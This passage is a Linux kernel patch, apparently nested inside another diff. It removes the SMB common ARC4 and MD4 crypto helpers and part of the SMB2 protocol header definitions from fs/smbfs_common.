+@@ -1,23 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0+ */
+-/*
+- * Common values for ARC4 Cipher Algorithm
+- */
+-
+-#ifndef _CRYPTO_ARC4_H
+-#define _CRYPTO_ARC4_H
+-
+-#include <linux/types.h>
+-
+-#define ARC4_MIN_KEY_SIZE	1
+-#define ARC4_MAX_KEY_SIZE	256
+-#define ARC4_BLOCK_SIZE		1
+-
+-struct arc4_ctx {
+-	u32 S[256];
+-	u32 x, y;
+-};
+-
+-int cifs_arc4_setkey(struct arc4_ctx *ctx, const u8 *in_key, unsigned int key_len);
+-void cifs_arc4_crypt(struct arc4_ctx *ctx, u8 *out, const u8 *in, unsigned int len);
+-
+-#endif /* _CRYPTO_ARC4_H */
+diff --git a/fs/smbfs_common/cifs_arc4.c b/fs/smbfs_common/cifs_arc4.c
+deleted file mode 100644
+index 043e4cb839fa2..0000000000000
+--- a/fs/smbfs_common/cifs_arc4.c
++++ /dev/null
+@@ -1,74 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * Cryptographic API
+- *
+- * ARC4 Cipher Algorithm
+- *
+- * Jon Oberheide <jon@oberheide.org>
+- */
+-
+-#include <linux/module.h>
+-#include "arc4.h"
+-
+-MODULE_LICENSE("GPL");
+-
+-int cifs_arc4_setkey(struct arc4_ctx *ctx, const u8 *in_key, unsigned int key_len)
+-{
+-	int i, j = 0, k = 0;
+-
+-	ctx->x = 1;
+-	ctx->y = 0;
+-
+-	for (i = 0; i < 256; i++)
+-		ctx->S[i] = i;
+-
+-	for (i = 0; i < 256; i++) {
+-		u32 a = ctx->S[i];
+-
+-		j = (j + in_key[k] + a) & 0xff;
+-		ctx->S[i] = ctx->S[j];
+-		ctx->S[j] = a;
+-		if (++k >= key_len)
+-			k = 0;
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(cifs_arc4_setkey);
+-
+-void cifs_arc4_crypt(struct arc4_ctx *ctx, u8 *out, const u8 *in, unsigned int len)
+-{
+-	u32 *const S = ctx->S;
+-	u32 x, y, a, b;
+-	u32 ty, ta, tb;
+-
+-	if (len == 0)
+-		return;
+-
+-	x = ctx->x;
+-	y = ctx->y;
+-
+-	a = S[x];
+-	y = (y + a) & 0xff;
+-	b = S[y];
+-
+-	do {
+-		S[y] = a;
+-		a = (a + b) & 0xff;
+-		S[x] = b;
+-		x = (x + 1) & 0xff;
+-		ta = S[x];
+-		ty = (y + ta) & 0xff;
+-		tb = S[ty];
+-		*out++ = *in++ ^ S[a];
+-		if (--len == 0)
+-			break;
+-		y = ty;
+-		a = ta;
+-		b = tb;
+-	} while (true);
+-
+-	ctx->x = x;
+-	ctx->y = y;
+-}
+-EXPORT_SYMBOL_GPL(cifs_arc4_crypt);
+diff --git a/fs/smbfs_common/cifs_md4.c b/fs/smbfs_common/cifs_md4.c
+deleted file mode 100644
+index 50f78cfc6ce92..0000000000000
+--- a/fs/smbfs_common/cifs_md4.c
++++ /dev/null
+@@ -1,197 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * Cryptographic API.
+- *
+- * MD4 Message Digest Algorithm (RFC1320).
+- *
+- * Implementation derived from Andrew Tridgell and Steve French's
+- * CIFS MD4 implementation, and the cryptoapi implementation
+- * originally based on the public domain implementation written
+- * by Colin Plumb in 1993.
+- *
+- * Copyright (c) Andrew Tridgell 1997-1998.
+- * Modified by Steve French (sfrench@us.ibm.com) 2002
+- * Copyright (c) Cryptoapi developers.
+- * Copyright (c) 2002 David S. Miller (davem@redhat.com)
+- * Copyright (c) 2002 James Morris <jmorris@intercode.com.au>
+- *
+- */
+-#include <linux/init.h>
+-#include <linux/kernel.h>
+-#include <linux/module.h>
+-#include <linux/string.h>
+-#include <linux/types.h>
+-#include <asm/byteorder.h>
+-#include "md4.h"
+-
+-MODULE_LICENSE("GPL");
+-
+-static inline u32 lshift(u32 x, unsigned int s)
+-{
+-	x &= 0xFFFFFFFF;
+-	return ((x << s) & 0xFFFFFFFF) | (x >> (32 - s));
+-}
+-
+-static inline u32 F(u32 x, u32 y, u32 z)
+-{
+-	return (x & y) | ((~x) & z);
+-}
+-
+-static inline u32 G(u32 x, u32 y, u32 z)
+-{
+-	return (x & y) | (x & z) | (y & z);
+-}
+-
+-static inline u32 H(u32 x, u32 y, u32 z)
+-{
+-	return x ^ y ^ z;
+-}
+-
+-#define ROUND1(a,b,c,d,k,s) (a = lshift(a + F(b,c,d) + k, s))
+-#define ROUND2(a,b,c,d,k,s) (a = lshift(a + G(b,c,d) + k + (u32)0x5A827999,s))
+-#define ROUND3(a,b,c,d,k,s) (a = lshift(a + H(b,c,d) + k + (u32)0x6ED9EBA1,s))
+-
+-static void md4_transform(u32 *hash, u32 const *in)
+-{
+-	u32 a, b, c, d;
+-
+-	a = hash[0];
+-	b = hash[1];
+-	c = hash[2];
+-	d = hash[3];
+-
+-	ROUND1(a, b, c, d, in[0], 3);
+-	ROUND1(d, a, b, c, in[1], 7);
+-	ROUND1(c, d, a, b, in[2], 11);
+-	ROUND1(b, c, d, a, in[3], 19);
+-	ROUND1(a, b, c, d, in[4], 3);
+-	ROUND1(d, a, b, c, in[5], 7);
+-	ROUND1(c, d, a, b, in[6], 11);
+-	ROUND1(b, c, d, a, in[7], 19);
+-	ROUND1(a, b, c, d, in[8], 3);
+-	ROUND1(d, a, b, c, in[9], 7);
+-	ROUND1(c, d, a, b, in[10], 11);
+-	ROUND1(b, c, d, a, in[11], 19);
+-	ROUND1(a, b, c, d, in[12], 3);
+-	ROUND1(d, a, b, c, in[13], 7);
+-	ROUND1(c, d, a, b, in[14], 11);
+-	ROUND1(b, c, d, a, in[15], 19);
+-
+-	ROUND2(a, b, c, d, in[0], 3);
+-	ROUND2(d, a, b, c, in[4], 5);
+-	ROUND2(c, d, a, b, in[8], 9);
+-	ROUND2(b, c, d, a, in[12], 13);
+-	ROUND2(a, b, c, d, in[1], 3);
+-	ROUND2(d, a, b, c, in[5], 5);
+-	ROUND2(c, d, a, b, in[9], 9);
+-	ROUND2(b, c, d, a, in[13], 13);
+-	ROUND2(a, b, c, d, in[2], 3);
+-	ROUND2(d, a, b, c, in[6], 5);
+-	ROUND2(c, d, a, b, in[10], 9);
+-	ROUND2(b, c, d, a, in[14], 13);
+-	ROUND2(a, b, c, d, in[3], 3);
+-	ROUND2(d, a, b, c, in[7], 5);
+-	ROUND2(c, d, a, b, in[11], 9);
+-	ROUND2(b, c, d, a, in[15], 13);
+-
+-	ROUND3(a, b, c, d, in[0], 3);
+-	ROUND3(d, a, b, c, in[8], 9);
+-	ROUND3(c, d, a, b, in[4], 11);
+-	ROUND3(b, c, d, a, in[12], 15);
+-	ROUND3(a, b, c, d, in[2], 3);
+-	ROUND3(d, a, b, c, in[10], 9);
+-	ROUND3(c, d, a, b, in[6], 11);
+-	ROUND3(b, c, d, a, in[14], 15);
+-	ROUND3(a, b, c, d, in[1], 3);
+-	ROUND3(d, a, b, c, in[9], 9);
+-	ROUND3(c, d, a, b, in[5], 11);
+-	ROUND3(b, c, d, a, in[13], 15);
+-	ROUND3(a, b, c, d, in[3], 3);
+-	ROUND3(d, a, b, c, in[11], 9);
+-	ROUND3(c, d, a, b, in[7], 11);
+-	ROUND3(b, c, d, a, in[15], 15);
+-
+-	hash[0] += a;
+-	hash[1] += b;
+-	hash[2] += c;
+-	hash[3] += d;
+-}
+-
+-static inline void md4_transform_helper(struct md4_ctx *ctx)
+-{
+-	le32_to_cpu_array(ctx->block, ARRAY_SIZE(ctx->block));
+-	md4_transform(ctx->hash, ctx->block);
+-}
+-
+-int cifs_md4_init(struct md4_ctx *mctx)
+-{
+-	memset(mctx, 0, sizeof(struct md4_ctx));
+-	mctx->hash[0] = 0x67452301;
+-	mctx->hash[1] = 0xefcdab89;
+-	mctx->hash[2] = 0x98badcfe;
+-	mctx->hash[3] = 0x10325476;
+-	mctx->byte_count = 0;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(cifs_md4_init);
+-
+-int cifs_md4_update(struct md4_ctx *mctx, const u8 *data, unsigned int len)
+-{
+-	const u32 avail = sizeof(mctx->block) - (mctx->byte_count & 0x3f);
+-
+-	mctx->byte_count += len;
+-
+-	if (avail > len) {
+-		memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
+-		       data, len);
+-		return 0;
+-	}
+-
+-	memcpy((char *)mctx->block + (sizeof(mctx->block) - avail),
+-	       data, avail);
+-
+-	md4_transform_helper(mctx);
+-	data += avail;
+-	len -= avail;
+-
+-	while (len >= sizeof(mctx->block)) {
+-		memcpy(mctx->block, data, sizeof(mctx->block));
+-		md4_transform_helper(mctx);
+-		data += sizeof(mctx->block);
+-		len -= sizeof(mctx->block);
+-	}
+-
+-	memcpy(mctx->block, data, len);
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(cifs_md4_update);
+-
+-int cifs_md4_final(struct md4_ctx *mctx, u8 *out)
+-{
+-	const unsigned int offset = mctx->byte_count & 0x3f;
+-	char *p = (char *)mctx->block + offset;
+-	int padding = 56 - (offset + 1);
+-
+-	*p++ = 0x80;
+-	if (padding < 0) {
+-		memset(p, 0x00, padding + sizeof(u64));
+-		md4_transform_helper(mctx);
+-		p = (char *)mctx->block;
+-		padding = 56;
+-	}
+-
+-	memset(p, 0, padding);
+-	mctx->block[14] = mctx->byte_count << 3;
+-	mctx->block[15] = mctx->byte_count >> 29;
+-	le32_to_cpu_array(mctx->block, (sizeof(mctx->block) -
+-			  sizeof(u64)) / sizeof(u32));
+-	md4_transform(mctx->hash, mctx->block);
+-	cpu_to_le32_array(mctx->hash, ARRAY_SIZE(mctx->hash));
+-	memcpy(out, mctx->hash, sizeof(mctx->hash));
+-	memset(mctx, 0, sizeof(*mctx));
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(cifs_md4_final);
+diff --git a/fs/smbfs_common/md4.h b/fs/smbfs_common/md4.h
+deleted file mode 100644
+index 5337becc699ab..0000000000000
+--- a/fs/smbfs_common/md4.h
++++ /dev/null
+@@ -1,27 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0+ */
+-/*
+- * Common values for ARC4 Cipher Algorithm
+- */
+-
+-#ifndef _CIFS_MD4_H
+-#define _CIFS_MD4_H
+-
+-#include <linux/types.h>
+-
+-#define MD4_DIGEST_SIZE		16
+-#define MD4_HMAC_BLOCK_SIZE	64
+-#define MD4_BLOCK_WORDS		16
+-#define MD4_HASH_WORDS		4
+-
+-struct md4_ctx {
+-	u32 hash[MD4_HASH_WORDS];
+-	u32 block[MD4_BLOCK_WORDS];
+-	u64 byte_count;
+-};
+-
+-
+-int cifs_md4_init(struct md4_ctx *mctx);
+-int cifs_md4_update(struct md4_ctx *mctx, const u8 *data, unsigned int len);
+-int cifs_md4_final(struct md4_ctx *mctx, u8 *out);
+-
+-#endif /* _CIFS_MD4_H */
+diff --git a/fs/smbfs_common/smb2pdu.h b/fs/smbfs_common/smb2pdu.h
+deleted file mode 100644
+index 7d605db3bb3b9..0000000000000
+--- a/fs/smbfs_common/smb2pdu.h
++++ /dev/null
+@@ -1,1702 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-#ifndef _COMMON_SMB2PDU_H
+-#define _COMMON_SMB2PDU_H
+-
+-/*
+- * Note that, due to trying to use names similar to the protocol specifications,
+- * there are many mixed case field names in the structures below.  Although
+- * this does not match typical Linux kernel style, it is necessary to be
+- * able to match against the protocol specfication.
+- *
+- * SMB2 commands
+- * Some commands have minimal (wct=0,bcc=0), or uninteresting, responses
+- * (ie no useful data other than the SMB error code itself) and are marked such.
+- * Knowing this helps avoid response buffer allocations and copy in some cases.
+- */
+-
+-/* List of commands in host endian */
+-#define SMB2_NEGOTIATE_HE	0x0000
+-#define SMB2_SESSION_SETUP_HE	0x0001
+-#define SMB2_LOGOFF_HE		0x0002 /* trivial request/resp */
+-#define SMB2_TREE_CONNECT_HE	0x0003
+-#define SMB2_TREE_DISCONNECT_HE	0x0004 /* trivial req/resp */
+-#define SMB2_CREATE_HE		0x0005
+-#define SMB2_CLOSE_HE		0x0006
+-#define SMB2_FLUSH_HE		0x0007 /* trivial resp */
+-#define SMB2_READ_HE		0x0008
+-#define SMB2_WRITE_HE		0x0009
+-#define SMB2_LOCK_HE		0x000A
+-#define SMB2_IOCTL_HE		0x000B
+-#define SMB2_CANCEL_HE		0x000C
+-#define SMB2_ECHO_HE		0x000D
+-#define SMB2_QUERY_DIRECTORY_HE	0x000E
+-#define SMB2_CHANGE_NOTIFY_HE	0x000F
+-#define SMB2_QUERY_INFO_HE	0x0010
+-#define SMB2_SET_INFO_HE	0x0011
+-#define SMB2_OPLOCK_BREAK_HE	0x0012
+-
+-/* The same list in little endian */
+-#define SMB2_NEGOTIATE		cpu_to_le16(SMB2_NEGOTIATE_HE)
+-#define SMB2_SESSION_SETUP	cpu_to_le16(SMB2_SESSION_SETUP_HE)
+-#define SMB2_LOGOFF		cpu_to_le16(SMB2_LOGOFF_HE)
+-#define SMB2_TREE_CONNECT	cpu_to_le16(SMB2_TREE_CONNECT_HE)
+-#define SMB2_TREE_DISCONNECT	cpu_to_le16(SMB2_TREE_DISCONNECT_HE)
+-#define SMB2_CREATE		cpu_to_le16(SMB2_CREATE_HE)
+-#define SMB2_CLOSE		cpu_to_le16(SMB2_CLOSE_HE)
+-#define SMB2_FLUSH		cpu_to_le16(SMB2_FLUSH_HE)
+-#define SMB2_READ		cpu_to_le16(SMB2_READ_HE)
+-#define SMB2_WRITE		cpu_to_le16(SMB2_WRITE_HE)
+-#define SMB2_LOCK		cpu_to_le16(SMB2_LOCK_HE)
+-#define SMB2_IOCTL		cpu_to_le16(SMB2_IOCTL_HE)
+-#define SMB2_CANCEL		cpu_to_le16(SMB2_CANCEL_HE)
+-#define SMB2_ECHO		cpu_to_le16(SMB2_ECHO_HE)
+-#define SMB2_QUERY_DIRECTORY	cpu_to_le16(SMB2_QUERY_DIRECTORY_HE)
+-#define SMB2_CHANGE_NOTIFY	cpu_to_le16(SMB2_CHANGE_NOTIFY_HE)
+-#define SMB2_QUERY_INFO		cpu_to_le16(SMB2_QUERY_INFO_HE)
+-#define SMB2_SET_INFO		cpu_to_le16(SMB2_SET_INFO_HE)
+-#define SMB2_OPLOCK_BREAK	cpu_to_le16(SMB2_OPLOCK_BREAK_HE)
+-
+-#define SMB2_INTERNAL_CMD	cpu_to_le16(0xFFFF)
+-
+-#define NUMBER_OF_SMB2_COMMANDS	0x0013
+-
+-/*
+- * Size of the session key (crypto key encrypted with the password
+- */
+-#define SMB2_NTLMV2_SESSKEY_SIZE	16
+-#define SMB2_SIGNATURE_SIZE		16
+-#define SMB2_HMACSHA256_SIZE		32
+-#define SMB2_CMACAES_SIZE		16
+-#define SMB3_GCM128_CRYPTKEY_SIZE	16
+-#define SMB3_GCM256_CRYPTKEY_SIZE	32
+-
+-/*
+- * Size of the smb3 encryption/decryption keys
+- * This size is big enough to store any cipher key types.
+- */
+-#define SMB3_ENC_DEC_KEY_SIZE		32
+-
+-/*
+- * Size of the smb3 signing key
+- */
+-#define SMB3_SIGN_KEY_SIZE		16
+-
+-#define CIFS_CLIENT_CHALLENGE_SIZE	8
+-
+-/* Maximum buffer size value we can send with 1 credit */
+-#define SMB2_MAX_BUFFER_SIZE 65536
+-
+-/*
+- * The default wsize is 1M for SMB2 (and for some CIFS cases).
+- * find_get_pages seems to return a maximum of 256
+- * pages in a single call. With PAGE_SIZE == 4k, this means we can
+- * fill a single wsize request with a single call.
+- */
+-#define SMB3_DEFAULT_IOSIZE (4 * 1024 * 1024)
+-
+-/*
+- * SMB2 Header Definition
+- *
+- * "MBZ" :  Must be Zero
+- * "BB"  :  BugBug, Something to check/review/analyze later
+- * "PDU" :  "Protocol Data Unit" (ie a network "frame")
+- *
+- */
+-
+-#define __SMB2_HEADER_STRUCTURE_SIZE	64
+-#define SMB2_HEADER_STRUCTURE_SIZE				\
+-	cpu_to_le16(__SMB2_HEADER_STRUCTURE_SIZE)
+-
+-#define SMB2_PROTO_NUMBER cpu_to_le32(0x424d53fe)
+-#define SMB2_TRANSFORM_PROTO_NUM cpu_to_le32(0x424d53fd)
+-#define SMB2_COMPRESSION_TRANSFORM_ID cpu_to_le32(0x424d53fc)
+-
+-/*
+- *	SMB2 flag definitions
+- */
+-#define SMB2_FLAGS_SERVER_TO_REDIR	cpu_to_le32(0x00000001)
+-#define SMB2_FLAGS_ASYNC_COMMAND	cpu_to_le32(0x00000002)
+-#define SMB2_FLAGS_RELATED_OPERATIONS	cpu_to_le32(0x00000004)
+-#define SMB2_FLAGS_SIGNED		cpu_to_le32(0x00000008)
+-#define SMB2_FLAGS_PRIORITY_MASK	cpu_to_le32(0x00000070) /* SMB3.1.1 */
+-#define SMB2_FLAGS_DFS_OPERATIONS	cpu_to_le32(0x10000000)
+-#define SMB2_FLAGS_REPLAY_OPERATION	cpu_to_le32(0x20000000) /* SMB3 & up */
+-
+-/*
+- *	Definitions for SMB2 Protocol Data Units (network frames)
+- *
+- *  See MS-SMB2.PDF specification for protocol details.
+- *  The Naming convention is the lower case version of the SMB2
+- *  command code name for the struct. Note that structures must be packed.
+- *
+- */
+-
+-/* See MS-SMB2 section 2.2.1 */
+-struct smb2_hdr {
+-	__le32 ProtocolId;	/* 0xFE 'S' 'M' 'B' */
+-	__le16 StructureSize;	/* 64 */
+-	__le16 CreditCharge;	/* MBZ */
+-	__le32 Status;		/* Error from server */
+-	__le16 Command;
+-	__le16 CreditRequest;	/* CreditResponse */
+-	__le32 Flags;
+-	__le32 NextCommand;
+-	__le64 MessageId;
+-	union {
+-		struct {
+-			__le32 ProcessId;
+-			__le32  TreeId;
+-		} __packed SyncId;
+-		__le64  AsyncId;
+-	} __packed Id;
+-	__le64  SessionId;
+-	__u8   Signature[16];
+-} __packed;
+-
+-struct smb2_pdu {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize2; /* size of wct area (varies, request specific) */
+-} __packed;
+-
+-#define SMB2_ERROR_STRUCTURE_SIZE2	9
+-#define SMB2_ERROR_STRUCTURE_SIZE2_LE	cpu_to_le16(SMB2_ERROR_STRUCTURE_SIZE2)
+-
+-struct smb2_err_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;
+-	__u8   ErrorContextCount;
+-	__u8   Reserved;
+-	__le32 ByteCount;  /* even if zero, at least one byte follows */
+-	__u8   ErrorData[1];  /* variable length */
+-} __packed;
+-
+-#define SMB3_AES_CCM_NONCE 11
+-#define SMB3_AES_GCM_NONCE 12
+-
+-/* Transform flags (for 3.0 dialect this flag indicates CCM */
+-#define TRANSFORM_FLAG_ENCRYPTED	0x0001
+-struct smb2_transform_hdr {
+-	__le32 ProtocolId;	/* 0xFD 'S' 'M' 'B' */
+-	__u8   Signature[16];
+-	__u8   Nonce[16];
+-	__le32 OriginalMessageSize;
+-	__u16  Reserved1;
+-	__le16 Flags; /* EncryptionAlgorithm for 3.0, enc enabled for 3.1.1 */
+-	__le64  SessionId;
+-} __packed;
+-
+-
+-/* See MS-SMB2 2.2.42 */
+-struct smb2_compression_transform_hdr_unchained {
+-	__le32 ProtocolId;	/* 0xFC 'S' 'M' 'B' */
+-	__le32 OriginalCompressedSegmentSize;
+-	__le16 CompressionAlgorithm;
+-	__le16 Flags;
+-	__le16 Length; /* if chained it is length, else offset */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.42.1 */
+-#define SMB2_COMPRESSION_FLAG_NONE	0x0000
+-#define SMB2_COMPRESSION_FLAG_CHAINED	0x0001
+-
+-struct compression_payload_header {
+-	__le16	CompressionAlgorithm;
+-	__le16	Flags;
+-	__le32	Length; /* length of compressed playload including field below if present */
+-	/* __le32 OriginalPayloadSize; */ /* optional, present when LZNT1, LZ77, LZ77+Huffman */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.42.2 */
+-struct smb2_compression_transform_hdr_chained {
+-	__le32 ProtocolId;	/* 0xFC 'S' 'M' 'B' */
+-	__le32 OriginalCompressedSegmentSize;
+-	/* struct compression_payload_header[] */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.42.2.2 */
+-struct compression_pattern_payload_v1 {
+-	__le16	Pattern;
+-	__le16	Reserved1;
+-	__le16	Reserved2;
+-	__le32	Repetitions;
+-} __packed;
+-
+-/* See MS-SMB2 section 2.2.9.2 */
+-/* Context Types */
+-#define SMB2_RESERVED_TREE_CONNECT_CONTEXT_ID 0x0000
+-#define SMB2_REMOTED_IDENTITY_TREE_CONNECT_CONTEXT_ID cpu_to_le16(0x0001)
+-
+-struct tree_connect_contexts {
+-	__le16 ContextType;
+-	__le16 DataLength;
+-	__le32 Reserved;
+-	__u8   Data[];
+-} __packed;
+-
+-/* Remoted identity tree connect context structures - see MS-SMB2 2.2.9.2.1 */
+-struct smb3_blob_data {
+-	__le16 BlobSize;
+-	__u8   BlobData[];
+-} __packed;
+-
+-/* Valid values for Attr */
+-#define SE_GROUP_MANDATORY		0x00000001
+-#define SE_GROUP_ENABLED_BY_DEFAULT	0x00000002
+-#define SE_GROUP_ENABLED		0x00000004
+-#define SE_GROUP_OWNER			0x00000008
+-#define SE_GROUP_USE_FOR_DENY_ONLY	0x00000010
+-#define SE_GROUP_INTEGRITY		0x00000020
+-#define SE_GROUP_INTEGRITY_ENABLED	0x00000040
+-#define SE_GROUP_RESOURCE		0x20000000
+-#define SE_GROUP_LOGON_ID		0xC0000000
+-
+-/* struct sid_attr_data is SidData array in BlobData format then le32 Attr */
+-
+-struct sid_array_data {
+-	__le16 SidAttrCount;
+-	/* SidAttrList - array of sid_attr_data structs */
+-} __packed;
+-
+-struct luid_attr_data {
+-
+-} __packed;
+-
+-/*
+- * struct privilege_data is the same as BLOB_DATA - see MS-SMB2 2.2.9.2.1.5
+- * but with size of LUID_ATTR_DATA struct and BlobData set to LUID_ATTR DATA
+- */
+-
+-struct privilege_array_data {
+-	__le16 PrivilegeCount;
+-	/* array of privilege_data structs */
+-} __packed;
+-
+-struct remoted_identity_tcon_context {
+-	__le16 TicketType; /* must be 0x0001 */
+-	__le16 TicketSize; /* total size of this struct */
+-	__le16 User; /* offset to SID_ATTR_DATA struct with user info */
+-	__le16 UserName; /* offset to null terminated Unicode username string */
+-	__le16 Domain; /* offset to null terminated Unicode domain name */
+-	__le16 Groups; /* offset to SID_ARRAY_DATA struct with group info */
+-	__le16 RestrictedGroups; /* similar to above */
+-	__le16 Privileges; /* offset to PRIVILEGE_ARRAY_DATA struct */
+-	__le16 PrimaryGroup; /* offset to SID_ARRAY_DATA struct */
+-	__le16 Owner; /* offset to BLOB_DATA struct */
+-	__le16 DefaultDacl; /* offset to BLOB_DATA struct */
+-	__le16 DeviceGroups; /* offset to SID_ARRAY_DATA struct */
+-	__le16 UserClaims; /* offset to BLOB_DATA struct */
+-	__le16 DeviceClaims; /* offset to BLOB_DATA struct */
+-	__u8   TicketInfo[]; /* variable length buf - remoted identity data */
+-} __packed;
+-
+-struct smb2_tree_connect_req_extension {
+-	__le32 TreeConnectContextOffset;
+-	__le16 TreeConnectContextCount;
+-	__u8  Reserved[10];
+-	__u8  PathName[]; /* variable sized array */
+-	/* followed by array of TreeConnectContexts */
+-} __packed;
+-
+-/* Flags/Reserved for SMB3.1.1 */
+-#define SMB2_TREE_CONNECT_FLAG_CLUSTER_RECONNECT cpu_to_le16(0x0001)
+-#define SMB2_TREE_CONNECT_FLAG_REDIRECT_TO_OWNER cpu_to_le16(0x0002)
+-#define SMB2_TREE_CONNECT_FLAG_EXTENSION_PRESENT cpu_to_le16(0x0004)
+-
+-struct smb2_tree_connect_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 9 */
+-	__le16 Flags;		/* Flags in SMB3.1.1 */
+-	__le16 PathOffset;
+-	__le16 PathLength;
+-	__u8   Buffer[1];	/* variable length */
+-} __packed;
+-
+-/* Possible ShareType values */
+-#define SMB2_SHARE_TYPE_DISK	0x01
+-#define SMB2_SHARE_TYPE_PIPE	0x02
+-#define	SMB2_SHARE_TYPE_PRINT	0x03
+-
+-/*
+- * Possible ShareFlags - exactly one and only one of the first 4 caching flags
+- * must be set (any of the remaining, SHI1005, flags may be set individually
+- * or in combination.
+- */
+-#define SMB2_SHAREFLAG_MANUAL_CACHING			0x00000000
+-#define SMB2_SHAREFLAG_AUTO_CACHING			0x00000010
+-#define SMB2_SHAREFLAG_VDO_CACHING			0x00000020
+-#define SMB2_SHAREFLAG_NO_CACHING			0x00000030
+-#define SHI1005_FLAGS_DFS				0x00000001
+-#define SHI1005_FLAGS_DFS_ROOT				0x00000002
+-#define SHI1005_FLAGS_RESTRICT_EXCLUSIVE_OPENS		0x00000100
+-#define SHI1005_FLAGS_FORCE_SHARED_DELETE		0x00000200
+-#define SHI1005_FLAGS_ALLOW_NAMESPACE_CACHING		0x00000400
+-#define SHI1005_FLAGS_ACCESS_BASED_DIRECTORY_ENUM	0x00000800
+-#define SHI1005_FLAGS_FORCE_LEVELII_OPLOCK		0x00001000
+-#define SHI1005_FLAGS_ENABLE_HASH_V1			0x00002000
+-#define SHI1005_FLAGS_ENABLE_HASH_V2			0x00004000
+-#define SHI1005_FLAGS_ENCRYPT_DATA			0x00008000
+-#define SMB2_SHAREFLAG_IDENTITY_REMOTING		0x00040000 /* 3.1.1 */
+-#define SMB2_SHAREFLAG_COMPRESS_DATA			0x00100000 /* 3.1.1 */
+-#define SHI1005_FLAGS_ALL				0x0014FF33
+-
+-/* Possible share capabilities */
+-#define SMB2_SHARE_CAP_DFS	cpu_to_le32(0x00000008) /* all dialects */
+-#define SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY cpu_to_le32(0x00000010) /* 3.0 */
+-#define SMB2_SHARE_CAP_SCALEOUT	cpu_to_le32(0x00000020) /* 3.0 */
+-#define SMB2_SHARE_CAP_CLUSTER	cpu_to_le32(0x00000040) /* 3.0 */
+-#define SMB2_SHARE_CAP_ASYMMETRIC cpu_to_le32(0x00000080) /* 3.02 */
+-#define SMB2_SHARE_CAP_REDIRECT_TO_OWNER cpu_to_le32(0x00000100) /* 3.1.1 */
+-
+-struct smb2_tree_connect_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 16 */
+-	__u8   ShareType;	/* see below */
+-	__u8   Reserved;
+-	__le32 ShareFlags;	/* see below */
+-	__le32 Capabilities;	/* see below */
+-	__le32 MaximalAccess;
+-} __packed;
+-
+-struct smb2_tree_disconnect_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-struct smb2_tree_disconnect_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-
+-/*
+- * SMB2_NEGOTIATE_PROTOCOL  See MS-SMB2 section 2.2.3
+- */
+-/* SecurityMode flags */
+-#define	SMB2_NEGOTIATE_SIGNING_ENABLED     0x0001
+-#define	SMB2_NEGOTIATE_SIGNING_ENABLED_LE  cpu_to_le16(0x0001)
+-#define SMB2_NEGOTIATE_SIGNING_REQUIRED	   0x0002
+-#define SMB2_NEGOTIATE_SIGNING_REQUIRED_LE cpu_to_le16(0x0002)
+-#define SMB2_SEC_MODE_FLAGS_ALL            0x0003
+-
+-/* Capabilities flags */
+-#define SMB2_GLOBAL_CAP_DFS		0x00000001
+-#define SMB2_GLOBAL_CAP_LEASING		0x00000002 /* Resp only New to SMB2.1 */
+-#define SMB2_GLOBAL_CAP_LARGE_MTU	0X00000004 /* Resp only New to SMB2.1 */
+-#define SMB2_GLOBAL_CAP_MULTI_CHANNEL	0x00000008 /* New to SMB3 */
+-#define SMB2_GLOBAL_CAP_PERSISTENT_HANDLES 0x00000010 /* New to SMB3 */
+-#define SMB2_GLOBAL_CAP_DIRECTORY_LEASING  0x00000020 /* New to SMB3 */
+-#define SMB2_GLOBAL_CAP_ENCRYPTION	0x00000040 /* New to SMB3 */
+-/* Internal types */
+-#define SMB2_NT_FIND			0x00100000
+-#define SMB2_LARGE_FILES		0x00200000
+-
+-#define SMB2_CLIENT_GUID_SIZE		16
+-#define SMB2_CREATE_GUID_SIZE		16
+-
+-/* Dialects */
+-#define SMB10_PROT_ID  0x0000 /* local only, not sent on wire w/CIFS negprot */
+-#define SMB20_PROT_ID  0x0202
+-#define SMB21_PROT_ID  0x0210
+-#define SMB2X_PROT_ID  0x02FF
+-#define SMB30_PROT_ID  0x0300
+-#define SMB302_PROT_ID 0x0302
+-#define SMB311_PROT_ID 0x0311
+-#define BAD_PROT_ID    0xFFFF
+-
+-#define SMB311_SALT_SIZE			32
+-/* Hash Algorithm Types */
+-#define SMB2_PREAUTH_INTEGRITY_SHA512	cpu_to_le16(0x0001)
+-#define SMB2_PREAUTH_HASH_SIZE 64
+-
+-/* Negotiate Contexts - ContextTypes. See MS-SMB2 section 2.2.3.1 for details */
+-#define SMB2_PREAUTH_INTEGRITY_CAPABILITIES	cpu_to_le16(1)
+-#define SMB2_ENCRYPTION_CAPABILITIES		cpu_to_le16(2)
+-#define SMB2_COMPRESSION_CAPABILITIES		cpu_to_le16(3)
+-#define SMB2_NETNAME_NEGOTIATE_CONTEXT_ID	cpu_to_le16(5)
+-#define SMB2_TRANSPORT_CAPABILITIES		cpu_to_le16(6)
+-#define SMB2_RDMA_TRANSFORM_CAPABILITIES	cpu_to_le16(7)
+-#define SMB2_SIGNING_CAPABILITIES		cpu_to_le16(8)
+-#define SMB2_POSIX_EXTENSIONS_AVAILABLE		cpu_to_le16(0x100)
+-
+-struct smb2_neg_context {
+-	__le16	ContextType;
+-	__le16	DataLength;
+-	__le32	Reserved;
